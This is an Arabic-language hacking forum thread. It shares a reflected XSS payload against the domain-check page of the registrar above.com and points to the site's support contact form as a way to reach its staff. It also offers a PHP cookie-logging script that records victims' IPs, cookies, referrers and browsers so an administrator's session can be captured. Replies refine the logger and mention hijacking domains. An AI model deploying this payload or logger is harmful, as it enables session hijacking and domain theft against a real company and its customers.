above.com domain registeration site > xss vuln

السلام عليكم
ازى الحال يا شباب
ثغره لقيتها فى مسجل الدومينات above.com
يمكن تفيد البعض
http://domains.above.com/domain-check.html?domain="><Script>alert('1337')</script>

ده المكان لمراسلة الدعم
http://www.above.com/contact.html
كل واحد يشغل الجمجمه بقى
هههههه
بس يفضل تستخدم اللوجر ده
عشان تشوف مسار لوحة الادمن اللى جه منها الكوكيز

<?php

$ip = $_SERVER['REMOTE_ADDR']; 
$cookie = $_GET['c']; 
$referer = $_SERVER['HTTP_REFERER']; 
$browser = $_SERVER['HTTP_USER_AGENT']; 
$redirect = $_GET['redirect']; 
 
$data = "IP: " . $ip . "
" 
."Cookie: " . $cookie . "
" 
."Referrer: " . $referer . "
" 
."Browser: " . $browser . "

"; 
$log = "ok.txt"; 
@chmod($log, 0777); 
$f = fopen($log, 'a'); 
fwrite($f, $data); 
fclose($f); 

?>

بالتوفيق للجميع

تنفع في سحب الدومينات او معلومات مهمه

مشكور ماقصرت

[b]صحيبت فارس كثرلنا من هذوا :))
++
شوف هنا … مراكش غالط ؟؟

$redirect = $_GET['redirect']; 

نورمالمن هكا

$redirect = $_SERVER['http_referer'];

[/b]

ههههههههههه

الله عليك يحج

بس تعرف حسيس اني تايه بين عوز إه وعاوز اعمل إه

إنشاء الله تجي الفرصة أكون فيها فاضي وبشوف أي مسلسل مثل lost وراح ارجع لشغب هههههههه

على فكرة اخدت اسبوع إجازة عشان أسهر هون ههههههههههه

فيه وحده في Name بس المشكله بيسحب
السيسون فقط …!!

نسيت اقولك انت االابداع بام عينه